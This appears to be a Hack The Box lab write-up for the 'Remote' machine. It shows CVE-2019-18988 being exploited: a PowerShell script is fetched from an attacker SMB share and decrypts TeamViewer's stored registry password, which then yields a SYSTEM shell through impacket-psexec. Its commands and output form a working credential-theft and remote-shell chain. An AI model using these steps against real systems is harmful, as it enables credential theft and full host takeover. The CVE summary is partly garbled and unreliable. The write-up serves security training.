InfoSec LAB

Remote_Privilege_Escalation

Created: 3 min read

CVE-2019-18988

a vulnerability classified as critical was found in teamviewer desktop at 14.7.1965 . Affected by this vulnerability is an unknown function of the AES Key Handler component . Due to the manipulation in the Configuration File framework leads to a weak authentication class vulnerability.

the vulnerability was published on 2020-02-07 (undefined). this vulnerability is identified as cve-2019-18988 . The vulnerability is relatively popular, and although it is very complex. The attack can be launched from a distance. Successful exploitation requires a single authentication session. Neither technical details nor an exploit are publicly available.

There is no information about possible known countermeasures. It is suggested to replace the infected object with an alternative product.

Exploit

While there are so many tools available for the exploit, I will just use this PowerShell script found online

Exploitation

ps c:\tmp> copy \\10.10.14.5\smb\teamviewer\CVE-2019-18988.ps1 .
ps c:\tmp> . .\CVE-2019-18988.ps1

I transferred the PowerShell script and imported it to the current session for use

ps c:\tmp> Get-TeamViewPasswords
 
#################L   .###############u
##################N.@################ *
##################################### '>.n=L
###############################RR#### 'b"  9
###########################R#"  .#### @   .*
########################^   .e#######P   e"
#####################R#    o########P   @
###################P" .e> 4#" '####F  .F
#################R  .###& '#   ####  .#>
#################b.o#####  #N  "##" ."'>
#########################  ##N  "^ .# '>
############## "########R  ###&    ## '>
##############  E"##P^9#E  ####   8## '>
##############  E  "  9#F  ####k .### '>
##############  E     9#N  ########## '>
##############  E     9##.u########## '>
############## o"     9############## d
**************#       ***************
ManniTV
 
[+] hklm:\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version7
	[-] version : 7.0.43148
		[+] securitypasswordaes : 255 155 28 115 214 107 206 49 172 65 62 174 19 27 70 79 88 47 108 226 209 225 243 218 126 141 55 107 38 57 78 91
		[+] decrypt password ...
		[+] decrypted password: !R3m0te!

running the exploit cmdlet extracts and decrypts the encrypted password. it was located at the registry; hklm:\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version7\\SecurityPasswordAES The decrypted password is !R3m0te!

┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ impacket-psexec 'administrator:!R3m0te!@$IP' -target-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Requesting shares on 10.10.10.180.....
[*] Found writable share ADMIN$
[*] Uploading file tcjbQmcA.exe
[*] Opening SVCManager on 10.10.10.180.....
[*] Creating service XgJM on 10.10.10.180.....
[*] Starting service XgJM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
 
c:\Windows\system32> whoami
nt authority\system
 
c:\Windows\system32> hostname
remote
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::ba
   ipv6 address. . . . . . . . . . . : dead:beef::25dd:3404:8d18:2459
   link-local ipv6 address . . . . . : fe80::25dd:3404:8d18:2459%12
   ipv4 address. . . . . . . . . . . : 10.10.10.180
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%12
                                       10.10.10.2

System Level Compromise

Interactive Graph View

Backlinks